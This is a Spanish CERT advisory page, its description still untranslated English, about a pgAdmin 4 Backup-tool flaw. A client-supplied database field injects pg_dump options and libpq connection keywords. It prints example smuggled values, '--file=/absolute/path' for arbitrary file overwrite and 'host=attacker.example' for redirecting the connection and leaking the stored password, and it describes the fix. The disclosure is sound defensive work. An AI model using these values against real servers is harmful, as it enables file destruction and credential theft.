Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

CVE-2026-86864

Gravedad CVSS v4.0:
ALTA
Tipo:
CWE-22 Limitación incorrecta de nombre de ruta a un directorio restringido (Path Traversal)
Fecha de publicación:
17/09/2026
Última modificación:
21/09/2026

Descripción

*** Pendiente de traducción *** pgAdmin 4&amp;#39;s Backup tool appended the client-supplied &amp;#39;database&amp;#39; field from the /backup/job//object request to the pg_dump argument vector as a bare trailing positional argument, without validation. Because pg_dump parses its options with getopt_long, which permutes arguments, a value beginning with a dash was interpreted as an option rather than as a database name. A value such as --file=/absolute/path therefore overrode the storage-confined --file that pgAdmin had constructed earlier, causing pg_dump to write its output anywhere the pgAdmin process could write, outside the user&amp;#39;s File Manager storage directory. This yields arbitrary file creation and overwrite as the operating-system account running pgAdmin, which can destroy pgAdmin&amp;#39;s own configuration database and, depending on the target chosen, be escalated further.<br /> <br /> The same field additionally permitted connection-string injection. libpq expands a database name containing an equals sign into a full connection string, and keywords embedded there override the --host and --port that pgAdmin passes, so a value such as &amp;#39;host=attacker.example port=5432 dbname=x&amp;#39; redirected pg_dump to a server of the attacker&amp;#39;s choosing. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection carries that credential to the attacker-nominated endpoint. Both behaviours are reachable by any authenticated user holding the tools_backup permission, which is granted to the default User role.<br /> <br /> The fix stops passing the database name through the argument vector altogether and supplies it in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection string. This matches the approach already used by the Import/Export tool. Regression tests assert that the database name is absent from the constructed argument vector and that PGDATABASE carries the exact requested value.<br /> <br /> This issue affects pgAdmin 4: from the introduction of the trailing positional database argument in the Backup tool before 9.18.

Productos y versiones vulnerables

CPE Desde Hasta
cpe:2.3:a:pgadmin:pgadmin_4:*:*:*:*:*:postgresql:*:* 9.18 (excluyendo)


Referencias a soluciones, herramientas e información